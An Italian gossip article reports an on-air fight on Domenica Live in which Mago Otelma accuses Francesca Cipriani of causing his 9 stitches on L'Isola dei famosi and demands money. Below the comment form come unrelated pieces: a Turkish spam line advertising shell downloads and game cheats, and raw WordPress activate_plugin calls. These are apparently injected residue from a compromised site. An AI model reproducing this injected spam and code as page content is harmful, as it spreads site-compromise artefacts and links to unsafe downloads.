Domenica Live, il Mago Otelma denuncia Francesca Cipriani: “A causa sua 9 punti di sutura all’Isola dei famosi, voglio i soldi”



Scontro in diretta tv su Canale5 domenica 18 ottobre nella puntata di Domenica Live nel salotto di Barbara D’Urso. Lo scontro è avvenuto tra il Mago Otelma e Francesca Cipriani. Tutto nasce dalla loro partecipazione a L’Isola dei famosi a inizio 2019.

 

 

In quella circostanza la showgirl diede una spinta al Divino Otelma che cadde rovinosamente a terra. Otelma rimediò 9 punti di sutura. Ora ha provveduto a denunciare Francesca Cipriani, chiedendo i soldi all’ex prorompente concorrente del Grande Fratello. In studio la lite si è consumata tra insulti reciproci, con Barbara D’Urso che ha assistito alla scena praticamente in silenzio. Un vero trionfo della tv trash.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Shell İndir Oyun İndir Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );